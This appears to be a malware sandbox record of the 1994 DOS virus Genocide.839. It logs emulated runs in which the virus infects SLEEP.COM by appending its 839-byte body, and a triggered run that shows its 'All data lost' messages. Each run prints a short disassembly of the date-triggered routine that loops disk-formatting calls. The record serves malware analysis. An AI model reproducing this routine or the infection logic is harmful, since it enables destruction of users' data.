Sample viewer

vx.netlux.org/Virus.DOS.VCL.Genocide.839

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:09:35.608069462Z 42 PC: 12abc | Get date
0x12abc: cmp dx, 0x801
0x12ac0: jne 0x12ae8
0x12ac2: mov ah, 0x3e
0x12ac4: int 0x21
0x12ac6: mov byte ptr [0x3e9], 0x1a
0x12acb: mov al, 0
0x12acd: mov ah, 5
0x12acf: mov ch, 0
0x12ad1: mov dh, 0
0x12ad3: mov dl, byte ptr [0x3e9]
0x12ad7: int 0x13
0x12ad9: dec byte ptr [0x3e9]
0x12add: cmp byte ptr [0x3e9], 0xff
0x12ae2: jne 0x12acb
0x12ae4: call 0x12c66
0x12ae7: ret
0x12ae8: mov di, bp
0x12aea: mov bp, sp
0x12aec: sub sp, 0x80
0x12af0: mov ah, 0x2f
2018-12-17T23:09:35.611566201Z 47 PC: 12af4 | Get disk transfer address
2018-12-17T23:09:35.613160503Z 26 PC: 12afc | Set disk transfer address
2018-12-17T23:09:35.614464956Z 71 PC: 12b24 | Get current directory
2018-12-17T23:09:35.619519566Z 59 PC: 12b2c | Change current directory
2018-12-17T23:09:35.625265237Z 47 PC: 12b41 | Get disk transfer address
2018-12-17T23:09:35.627521756Z 26 PC: 12b4f | Set disk transfer address
2018-12-17T23:09:35.629458678Z 78 PC: 12b5a | Find first file
2018-12-17T23:09:35.64279182Z 79 PC: 12b82 | Find next file
2018-12-17T23:09:35.648359736Z 79 PC: 12b82 | Find next file
2018-12-17T23:09:35.651321239Z 79 PC: 12b82 | Find next file
2018-12-17T23:09:35.654735857Z 79 PC: 12b82 | Find next file
2018-12-17T23:09:35.657636475Z 79 PC: 12b82 | Find next file
2018-12-17T23:09:35.660662472Z 79 PC: 12b82 | Find next file
2018-12-17T23:09:35.668437734Z 79 PC: 12b82 | Find next file
2018-12-17T23:09:35.671465989Z 79 PC: 12b82 | Find next file
2018-12-17T23:09:35.674505809Z 79 PC: 12b82 | Find next file
2018-12-17T23:09:35.677673549Z 47 PC: 12ba6 | Get disk transfer address
2018-12-17T23:09:35.68031257Z 26 PC: 12bb5 | Set disk transfer address
2018-12-17T23:09:35.68151014Z 78 PC: 12bbd | Find first file
2018-12-17T23:09:35.688576176Z 47 PC: 12bd5 | Get disk transfer address
2018-12-17T23:09:35.700919687Z 61 PC: 12bed | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:09:35.70921206Z 63 PC: 12bf9 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:09:35.716716821Z 66 PC: 12c01 | Move file pointer
2018-12-17T23:09:35.719736914Z 62 PC: 12c06 | Close file
2018-12-17T23:09:35.722862168Z 67 PC: 12c26 | Get or set file attributes
2018-12-17T23:09:35.741395181Z 61 PC: 12c2b | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:09:35.754432757Z 64 PC: 12c37 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:09:35.756790223Z 66 PC: 12c3f | Move file pointer
2018-12-17T23:09:35.758644762Z 64 PC: 12dfd | Write file or device (Write 839 bytes on handle 5)
2018-12-17T23:09:35.766081349Z 87 PC: 12c4f | Get or set file date and time
2018-12-17T23:09:35.767733524Z 62 PC: 12c53 | Close file
2018-12-17T23:09:35.773119353Z 67 PC: 12c60 | Get or set file attributes
2018-12-17T23:09:35.780648964Z 26 PC: 12bcf | Set disk transfer address
2018-12-17T23:09:35.782255368Z 26 PC: 12b92 | Set disk transfer address
2018-12-17T23:09:35.783704856Z 59 PC: 12b36 | Change current directory
2018-12-17T23:09:35.786010075Z 26 PC: 12b04 | Set disk transfer address
2018-12-17T23:09:35.788294134Z 26 PC: 12a47 | Set disk transfer address
2018-12-17T23:09:35.790067776Z 78 PC: 12a6a | Find first file
2018-12-17T23:09:35.79408291Z 76 PC: 12a77 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16586,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:53:27.935860656Z 42 PC: 12abc | Get date
0x12abc: cmp dx, 0x801
0x12ac0: jne 0x12ae8
0x12ac2: mov ah, 0x3e
0x12ac4: int 0x21
0x12ac6: mov byte ptr [0x3e9], 0x1a
0x12acb: mov al, 0
0x12acd: mov ah, 5
0x12acf: mov ch, 0
0x12ad1: mov dh, 0
0x12ad3: mov dl, byte ptr [0x3e9]
0x12ad7: int 0x13
0x12ad9: dec byte ptr [0x3e9]
0x12add: cmp byte ptr [0x3e9], 0xff
0x12ae2: jne 0x12acb
0x12ae4: call 0x12c66
0x12ae7: ret
0x12ae8: mov di, bp
0x12aea: mov bp, sp
0x12aec: sub sp, 0x80
0x12af0: mov ah, 0x2f
2018-12-25T12:53:27.939064894Z 47 PC: 12af4 | Get disk transfer address
2018-12-25T12:53:27.940301124Z 26 PC: 12afc | Set disk transfer address
2018-12-25T12:53:27.941333049Z 71 PC: 12b24 | Get current directory
2018-12-25T12:53:27.944457727Z 59 PC: 12b2c | Change current directory
2018-12-25T12:53:27.949569187Z 47 PC: 12b41 | Get disk transfer address
2018-12-25T12:53:27.951043975Z 26 PC: 12b4f | Set disk transfer address
2018-12-25T12:53:27.952131088Z 78 PC: 12b5a | Find first file
2018-12-25T12:53:27.959336091Z 79 PC: 12b82 | Find next file
2018-12-25T12:53:27.962158934Z 79 PC: 12b82 | Find next file (See above)
2018-12-25T12:53:27.964865266Z 79 PC: 12b82 | Find next file (See above)
2018-12-25T12:53:27.968509723Z 79 PC: 12b82 | Find next file (See above)
2018-12-25T12:53:27.971572091Z 79 PC: 12b82 | Find next file (See above)
2018-12-25T12:53:27.974412047Z 79 PC: 12b82 | Find next file (See above)
2018-12-25T12:53:27.97746719Z 79 PC: 12b82 | Find next file (See above)
2018-12-25T12:53:27.980524242Z 79 PC: 12b82 | Find next file (See above)
2018-12-25T12:53:27.983234528Z 79 PC: 12b82 | Find next file (See above)
2018-12-25T12:53:27.986590063Z 47 PC: 12ba6 | Get disk transfer address
2018-12-25T12:53:27.987914783Z 26 PC: 12bb5 | Set disk transfer address
2018-12-25T12:53:27.989136917Z 78 PC: 12bbd | Find first file
2018-12-25T12:53:27.996037221Z 47 PC: 12bd5 | Get disk transfer address
2018-12-25T12:53:27.997313848Z 61 PC: 12bed | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:53:28.005205205Z 63 PC: 12bf9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:53:28.012120349Z 66 PC: 12c01 | Move file pointer
2018-12-25T12:53:28.013948201Z 62 PC: 12c06 | Close file
2018-12-25T12:53:28.015795637Z 67 PC: 12c26 | Get or set file attributes
2018-12-25T12:53:28.03195751Z 61 PC: 12c2b | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:53:28.039228599Z 64 PC: 12c37 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:53:28.042121753Z 66 PC: 12c3f | Move file pointer
2018-12-25T12:53:28.044363332Z 64 PC: 12dfd | Write file or device (Write 839 bytes on handle 5)
2018-12-25T12:53:28.054309496Z 87 PC: 12c4f | Get or set file date and time
2018-12-25T12:53:28.05626294Z 62 PC: 12c53 | Close file
2018-12-25T12:53:28.064844614Z 67 PC: 12c60 | Get or set file attributes
2018-12-25T12:53:28.076495776Z 26 PC: 12bcf | Set disk transfer address
2018-12-25T12:53:28.077754687Z 26 PC: 12b92 | Set disk transfer address
2018-12-25T12:53:28.07896063Z 59 PC: 12b36 | Change current directory
2018-12-25T12:53:28.081279334Z 26 PC: 12b04 | Set disk transfer address
2018-12-25T12:53:28.082537098Z 26 PC: 12a47 | Set disk transfer address
2018-12-25T12:53:28.083782418Z 78 PC: 12a6a | Find first file
2018-12-25T12:53:28.086312479Z 76 PC: 12a77 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16586,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:53:28.267918633Z 42 PC: 12abc | Get date
0x12abc: cmp dx, 0x801
0x12ac0: jne 0x12ae8
0x12ac2: mov ah, 0x3e
0x12ac4: int 0x21
0x12ac6: mov byte ptr [0x3e9], 0x1a
0x12acb: mov al, 0
0x12acd: mov ah, 5
0x12acf: mov ch, 0
0x12ad1: mov dh, 0
0x12ad3: mov dl, byte ptr [0x3e9]
0x12ad7: int 0x13
0x12ad9: dec byte ptr [0x3e9]
0x12add: cmp byte ptr [0x3e9], 0xff
0x12ae2: jne 0x12acb
0x12ae4: call 0x12c66
0x12ae7: ret
0x12ae8: mov di, bp
0x12aea: mov bp, sp
0x12aec: sub sp, 0x80
0x12af0: mov ah, 0x2f
2018-12-25T12:53:28.270367948Z 62 PC: 12ac6 | Close file
2018-12-25T12:53:28.27489777Z 9 PC: 12c85 | Display string (String= '* This was a very bad day to switch on the Computer! *')
2018-12-25T12:53:28.279460681Z 9 PC: 12c93 | Display string (String= ' --- Files Infected by the : Genocide2 Virus�! ---')
2018-12-25T12:53:28.284503075Z 9 PC: 12ca1 | Display string (String= ' == Copyright (C) Invader Pro. South Africa 1994. ==')
2018-12-25T12:53:28.287554836Z 9 PC: 12cb4 | Display string (String= 'All data lost ... Have a nice Day!')
2018-12-25T12:53:28.300139982Z 8 PC: 12cb8 | Console input without echo